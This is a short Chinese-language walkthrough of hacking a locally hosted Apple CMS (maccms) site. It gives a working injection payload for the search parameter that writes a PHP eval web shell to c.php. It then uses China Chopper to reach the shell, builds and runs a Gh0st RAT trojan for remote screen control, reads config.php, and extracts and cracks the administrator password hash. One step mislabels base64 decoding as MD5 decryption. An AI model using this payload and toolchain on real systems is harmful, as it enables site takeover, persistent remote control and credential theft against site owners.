用到的工具
· 火狐插件:hackbar
· 中国菜刀
· gh0st
· 苹果 cms 历史漏洞:https://blog.csdn.net/m0_37438418/article/details/81006161
操作步骤
- 下载火狐插件 hackbar ,在苹果 cms 的主页搜索界面:(临时搭的站)
http://192.168.0.137/
2.按下 F12 点 HackBar , 选择 Post data 填写如下内容,点击 Execute 按钮
·http://192.168.0.137/index.PHP?m=vod-search
·wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x
MD5解密:<?php @eval($_POST[c]); ?>1
就是创建 c.php 传入参数 c
3.打开中国菜刀,右键 -> 添加 。输入以下内容:
4. 找到 config.php 文件,打开:
5.打开 Gh0st 。选项 -> 创建客户 , 输入以下信息后测试连接:
在这里需要查找合适的端口,尽量选择数字大的端口,查看此端口是否被占用,如果被占用则结束占用此端口的进程:
- 如果测试连接成功,点击 “生成” 按钮 , 将木马文件保存。
- 把 server.exe 放入菜刀(直接拖进去)
- 打开菜刀 右键 -> 虚拟终端 , 输入 server.exe 执行木马文件。之后会在Gh0st 下看到被连接的用户。
- 右键 -> 屏幕控制 ,右键 -> 控制屏幕 。 打开 Phpstudy -> MySQL 管理器 -> MySQL-Front
10 找到在config.php 里对应的数据库名 “maccms” , 打开可疑的表 “mac_manager”
管理员账号:admin
管理员密码:a66abb5684c45962d887564f08346e8d
解密后:admin123456
登录后台:
成功!